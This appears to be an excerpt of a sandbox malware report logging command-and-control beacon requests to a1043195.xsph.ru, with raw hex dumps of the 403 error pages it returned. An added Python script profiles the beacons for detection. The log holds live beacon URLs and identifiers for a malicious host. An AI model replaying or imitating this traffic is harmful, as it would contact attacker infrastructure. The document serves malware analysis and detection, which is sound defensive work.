Source: global traffic HTTP traffic detected: GET /e561840a.php?xVG80hM=hn2&8PfMQbdasrWBeFMD7qf8K3A4XF9O9rr=CHDgx4&gqVdG=FeuUIF0I3yEOlyKbPbB9N8XBqQCi8Sy&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&xVG80hM=hn2&8PfMQbdasrWBeFMD7qf8K3A4XF9O9rr=CHDgx4&gqVdG=FeuUIF0I3yEOlyKbPbB9N8XBqQCi8Sy HTTP/1.1 Accept: */* Content-Type: text/javascript User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: a1043195.xsph.ru
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: a1043195.xsph.ru
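The requests above share one shape: every beacon hits the same /e561840a.php endpoint on a1043195.xsph.ru, carries two parameters whose 32-hex-character names and values never change, echoes its randomly named leading parameters verbatim at the end of the query, and rotates the User-Agent between Chrome and Edge builds. The script below is an added example, not part of the Joe Sandbox report or of the sample; it profiles three of the request targets copied from the entries above (Host was a1043195.xsph.ru for all of them, so only target and User-Agent are kept) and separates the fixed identifiers from the per-request padding. Treating the long constant value as Base64 written backwards is the example's own assumption; the report does not state the encoding, and the decode is offered only as a consistency check.

```python
"""Profile the beacon requests listed above: fixed identifiers vs. per-request padding."""
from __future__ import annotations

import base64
import binascii
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Constructed sample: three request targets and User-Agent strings copied from the
# HTTP entries above. Host was a1043195.xsph.ru for every request, so it is omitted.
UA_CHROME_95 = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
                "(KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36")
UA_EDGE_96_29 = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
                 "(KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29")
UA_EDGE_96_34 = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
                 "(KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34")

REQUESTS = [
    ("/e561840a.php?cl=MU3vrX2xf8nUihMHACnKj36jO&RpUrFFQZYG69rKpAFv3A0wkZY8y=NTXUg0GMdy3iEJI"
     "&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c"
     "&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM"
     "&cl=MU3vrX2xf8nUihMHACnKj36jO&RpUrFFQZYG69rKpAFv3A0wkZY8y=NTXUg0GMdy3iEJI", UA_CHROME_95),
    ("/e561840a.php?5KSwfM1XMNin8a1tisW=mdlGy9qsXR"
     "&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c"
     "&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM"
     "&5KSwfM1XMNin8a1tisW=mdlGy9qsXR", UA_EDGE_96_29),
    ("/e561840a.php?GTccho92yB5vkEA4AliLss3qVZVz6vp=S53xh1vrF239BgG&P0M=LxPYavHHTJ5CVc"
     "&oLMXJz0G0y3pzTSj=jQQep"
     "&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c"
     "&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM"
     "&GTccho92yB5vkEA4AliLss3qVZVz6vp=S53xh1vrF239BgG&P0M=LxPYavHHTJ5CVc"
     "&oLMXJz0G0y3pzTSj=jQQep", UA_EDGE_96_34),
]


def query_pairs(target: str) -> list[tuple[str, str]]:
    """Split a request target into its ordered (key, value) query pairs."""
    return parse_qsl(urlsplit(target).query, keep_blank_values=True)


def repeated_pairs(target: str) -> dict[str, str]:
    """Pairs that occur twice in one request with the same value: the random
    leading parameters are echoed verbatim at the end of every beacon."""
    counts = Counter(query_pairs(target))
    return {k: v for (k, v), n in counts.items() if n > 1}


def constant_pairs(targets: list[str]) -> dict[str, str]:
    """key=value pairs present in every request: the beacon's fixed identifiers."""
    return dict(set.intersection(*[set(query_pairs(t)) for t in targets]))


def is_hex(s: str) -> bool:
    """True for an even-length string of hex digits (bytes.fromhex rejects anything else)."""
    try:
        bytes.fromhex(s)
        return True
    except ValueError:
        return False


def decode_reversed_base64(value: str) -> bytes | None:
    """Assumption of this example (not stated in the report): the long constant
    value is Base64 written backwards. Reverse, re-pad, decode; None if it is not."""
    s = value[::-1]
    s += "=" * (-len(s) % 4)
    try:
        return base64.b64decode(s, validate=True)
    except (binascii.Error, ValueError):
        return None


def profile(requests: list[tuple[str, str]]) -> dict:
    """Summarise what stays constant and what changes across the beacons."""
    targets = [t for t, _ in requests]
    fixed = constant_pairs(targets)
    return {
        "paths": sorted({urlsplit(t).path for t in targets}),
        "fixed_params": fixed,
        "fixed_hex32_keys": sorted(k for k, v in fixed.items()
                                   if len(k) == 32 and is_hex(k) and is_hex(v)),
        "echoed_params": [sorted(repeated_pairs(t)) for t in targets],
        "distinct_user_agents": len({ua for _, ua in requests}),
        # Hex digits are a valid Base64 subset, so the 32-hex value would "decode"
        # to noise; only the non-hex constant is a reversed-Base64 candidate.
        "reversed_b64": {k: decode_reversed_base64(v) for k, v in fixed.items() if not is_hex(v)},
    }


if __name__ == "__main__":
    for key, val in profile(REQUESTS).items():
        print(f"{key}: {val}")
```

Under the reversed-Base64 assumption the 54-character constant decodes to a 40-character hex string, which is at least consistent with an identifier rather than random padding. For detection, keying on the fixed pair of 32-hex parameter names and on the echo of the leading parameters at the end of the query survives the per-request renaming and the User-Agent rotation, whereas a rule on any single random parameter name or on one User-Agent string would not.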
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sun, 24 Nov 2024 03:02:04 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 
67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sun, 24 Nov 2024 03:02:05 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 
67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sun, 24 Nov 2024 03:02:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 
67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sun, 24 Nov 2024 03:02:26 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 
67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sun, 24 Nov 2024 03:02:37 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 
67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
